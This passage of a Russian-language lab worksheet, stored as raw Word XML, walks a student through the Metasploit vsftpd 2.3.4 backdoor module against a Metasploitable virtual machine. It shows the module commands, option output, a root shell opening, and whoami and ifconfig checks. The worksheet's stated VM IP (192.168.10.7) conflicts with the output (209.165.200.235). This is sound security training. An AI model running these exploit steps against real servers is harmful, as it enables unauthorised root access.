        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">командной строке, чтобы использовать эксплойт-лазейку </w:t>
      </w:r>
      <w:r w:rsidR="001D0BC7" w:rsidRPr="001319BA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>vsftp</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5462B571" w14:textId="77777777" w:rsidR="00A77C27" w:rsidRPr="00D21F13" w:rsidRDefault="00A77C27" w:rsidP="00A77C27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msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>use exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D79281" w14:textId="4CE87CFA" w:rsidR="00A77C27" w:rsidRDefault="00D55621" w:rsidP="00A77C27">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r>
        <w:t>Из командной строки эксплойта укажите адрес целевого хоста виртуальной машины Metasploitable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1C52A2" w14:textId="77777777" w:rsidR="00A77C27" w:rsidRPr="008855F4" w:rsidRDefault="00A77C27" w:rsidP="00A77C27">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit(vsftpd_234_backdoor) &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 209.165.200.235</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9AB650" w14:textId="77777777" w:rsidR="00A77C27" w:rsidRDefault="00A77C27" w:rsidP="00A77C27">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>rhost =&gt; 209.165.200.235</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D511460" w14:textId="31C37FA3" w:rsidR="00A77C27" w:rsidRDefault="00A77C27" w:rsidP="00A77C27">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r>
        <w:t>Проверка настройки эксплойта. Введите</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">командной строке </w:t>
      </w:r>
      <w:r w:rsidR="00895A6C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A875D59" w14:textId="77777777" w:rsidR="00A77C27" w:rsidRPr="008855F4" w:rsidRDefault="00A77C27" w:rsidP="00A77C27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msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit(vsftpd_234_backdoor) &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4614FB32" w14:textId="77777777" w:rsidR="00A77C27" w:rsidRPr="008855F4" w:rsidRDefault="00A77C27" w:rsidP="001742CE">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12732F33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>Module options (exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/ftp/vsftpd_234_backdoor):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E66B4D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Name   Current </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Setting  Required</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DAF5685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----   ---------------  --------  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A96F539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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RHOST  209.165.200.235</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  yes       The target address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4A5B6F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RPORT  21               </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>yes</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">       The target port (TCP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA26EFE" w14:textId="77777777" w:rsidR="008855F4" w:rsidRPr="008855F4" w:rsidRDefault="008855F4" w:rsidP="008855F4">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6188CC8E" w14:textId="77777777" w:rsidR="008855F4" w:rsidRPr="008855F4" w:rsidRDefault="008855F4" w:rsidP="008855F4">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="581C4BF6" w14:textId="77777777" w:rsidR="008855F4" w:rsidRDefault="008855F4" w:rsidP="008855F4">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
      </w:pPr>
      <w:r>
        <w:t>Exploit target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509AF72E" w14:textId="77777777" w:rsidR="008855F4" w:rsidRDefault="008855F4" w:rsidP="008855F4">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> Id  Name--  ----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E345164" w14:textId="64097F3E" w:rsidR="00A77C27" w:rsidRPr="00D21F13" w:rsidRDefault="008855F4" w:rsidP="008855F4">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   0   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Automatic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="282345DE" w14:textId="77777777" w:rsidR="009A4690" w:rsidRDefault="0066585D" w:rsidP="0066585D">
      <w:pPr>
        <w:pStyle w:val="StepHead"/>
      </w:pPr>
      <w:r>
        <w:t>Выполнение эксплойта.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3C15A3" w14:textId="1230602E" w:rsidR="00166EDC" w:rsidRDefault="00166EDC" w:rsidP="00166EDC">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25"/>
      </w:pPr>
      <w:r>
        <w:t>Теперь вы будете использовать</w:t>
      </w:r>
      <w:r w:rsidR="009F3FD4" w:rsidRPr="001319BA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> эксплойт</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vsftpd для доступа</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:t>правами root</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> к </w:t>
      </w:r>
      <w:r>
        <w:t>виртуальной машине Metaspoitable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5816ECB3" w14:textId="0F87B8EE" w:rsidR="00166EDC" w:rsidRDefault="00895A6C" w:rsidP="00166EDC">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r>
        <w:t>В командной строке введите команду</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для выполнения данного эксплойта.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02836AD2" w14:textId="77777777" w:rsidR="00166EDC" w:rsidRPr="001660F4" w:rsidRDefault="00166EDC" w:rsidP="0052502C">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001660F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001660F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit(vsftpd_234_backdoor) &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="001660F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A59AF6" w14:textId="77777777" w:rsidR="00166EDC" w:rsidRPr="001660F4" w:rsidRDefault="00166EDC" w:rsidP="0052502C">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A368A57" w14:textId="77777777" w:rsidR="00166EDC" w:rsidRPr="001660F4" w:rsidRDefault="00166EDC" w:rsidP="0052502C">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001660F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[*] 209.165.200.235:21 - Banner: 220 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001660F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vsFTPd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001660F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.3.4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3965F434" w14:textId="77777777" w:rsidR="00166EDC" w:rsidRPr="008855F4" w:rsidRDefault="00166EDC" w:rsidP="0052502C">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[*] 209.165.200.235:21 - USER: 331 Please specify the password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175639DC" w14:textId="77777777" w:rsidR="00166EDC" w:rsidRPr="008855F4" w:rsidRDefault="00166EDC" w:rsidP="0052502C">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[+] 209.165.200.235:21 - Backdoor service has been spawned, handling...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F66950" w14:textId="77777777" w:rsidR="00166EDC" w:rsidRPr="008855F4" w:rsidRDefault="00166EDC" w:rsidP="0052502C">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t>[+] 209.165.200.235:21 - UID: uid=0(root) gid=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45330B56" w14:textId="77777777" w:rsidR="00166EDC" w:rsidRPr="008855F4" w:rsidRDefault="00166EDC" w:rsidP="0052502C">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[*] Found shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5246C3F3" w14:textId="70EE4262" w:rsidR="00166EDC" w:rsidRPr="008855F4" w:rsidRDefault="00166EDC" w:rsidP="0052502C">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[*] Command shell session</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7" w:rsidRPr="008855F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>opened (209.165.201.17:33985 -&gt; 209.165.200.235:6200) at 2017-07-11 11:53:35 -0400</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0EADAC" w14:textId="50EBF250" w:rsidR="005E4E96" w:rsidRDefault="005E4E96" w:rsidP="0052502C">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;Системное приглашение не отображается&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BBD390" w14:textId="67F9DE8A" w:rsidR="00D21F13" w:rsidRDefault="00D21F13" w:rsidP="0052502C">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
      </w:pPr>
      <w:r w:rsidRPr="00D21F13">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77DB530F" wp14:editId="039EF413">
            <wp:extent cx="4693920" cy="28079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515" cy="281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15B8" w14:textId="4966F3AF" w:rsidR="00166EDC" w:rsidRDefault="006D4A41" w:rsidP="00C73E6D">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Происходит вход</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:t>терминал Metasploit Framework,</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t>теперь вы получили доступ</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:t>правами root</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> к </w:t>
      </w:r>
      <w:r>
        <w:t>виртуальной машине Metasploitable</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:t>узла Kali. Обратите внимание на то, что системное приглашение отсутствует. Для того чтобы убедиться, что</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> у </w:t>
      </w:r>
      <w:r>
        <w:t>вас есть доступ</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> к </w:t>
      </w:r>
      <w:r>
        <w:t>виртуальной машине Metasploitable</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">правами root, введите команду </w:t>
      </w:r>
      <w:r w:rsidR="00C73E6D" w:rsidRPr="00EC36FD">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC628E2" w14:textId="77777777" w:rsidR="00C73E6D" w:rsidRPr="00C73E6D" w:rsidRDefault="00C73E6D" w:rsidP="00C73E6D">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295014D6" w14:textId="59B33ED7" w:rsidR="00D21F13" w:rsidRPr="001F195B" w:rsidRDefault="00C73E6D" w:rsidP="00D21F13">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Какое текущее имя пользователя? </w:t>
      </w:r>
      <w:r w:rsidR="00D21F13">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2290E6FF" w14:textId="689B6BD2" w:rsidR="00166EDC" w:rsidRDefault="00C73E6D" w:rsidP="00C73E6D">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Какое имя</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> у </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">данного хоста? </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00903082">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="00D21F13">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>etasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="25D23733" w14:textId="6C705374" w:rsidR="00903082" w:rsidRPr="00D21F13" w:rsidRDefault="00903082" w:rsidP="00C73E6D">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimSun"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00903082">
        <w:rPr>
          <w:rFonts w:eastAsia="SimSun"/>
          <w:noProof/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C3E8CA4" wp14:editId="3EF30FFC">
            <wp:extent cx="1114697" cy="68634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6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91AA" w14:textId="3001F76F" w:rsidR="00C73E6D" w:rsidRPr="00C73E6D" w:rsidRDefault="006D4A41" w:rsidP="00C73E6D">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">IP-адрес ВМ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r w:rsidR="00903082" w:rsidRPr="001F195B">
        <w:t>192.168.10.7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Введите команду </w:t>
      </w:r>
      <w:r w:rsidR="00C73E6D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для проверки IP-адреса текущего хоста.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B2F61B" w14:textId="77777777" w:rsidR="00166EDC" w:rsidRPr="008855F4" w:rsidRDefault="00166EDC" w:rsidP="00C73E6D">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6114AE16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eth0      Link </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>encap:Ethernet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HWaddr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 08:00:27:15:91:86</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71676FE9" w14:textId="77777777" w:rsidR="008855F4" w:rsidRPr="008855F4" w:rsidRDefault="008855F4" w:rsidP="008855F4">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>inet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> addr:</w:t>
      </w:r>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>209.165.200.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>235</w:t>
      </w:r>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  Bcast</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:209.165.200.255  Mask:255.255.255.224</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283D2965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inet6 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: fe</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>80::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">a00:27ff:fe15:9186/64 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Scope:Link</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4D69C2CF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UP BROADCAST RUNNING </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MULTICAST  MTU</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:1500  Metric:1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D636519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RX packets:78058 errors:2 dropped:0 overruns:0 frame:0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192A717C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TX packets:195672 errors:0 dropped:0 overruns:0 carrier:0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C507033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collisions:0 txqueuelen:1000 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04ED1951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RX bytes:11803523 (11.2 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MB)  TX</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> bytes:91415071 (87.1 MB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F0E22A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Interrupt:10 Base address:0xd020 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32211F67" w14:textId="77777777" w:rsidR="008855F4" w:rsidRPr="008855F4" w:rsidRDefault="008855F4" w:rsidP="008855F4">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BBE8A76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lo        Link </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>encap:Local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Loopback</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D294C1" w14:textId="77777777" w:rsidR="008855F4" w:rsidRPr="008855F4" w:rsidRDefault="008855F4" w:rsidP="008855F4">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
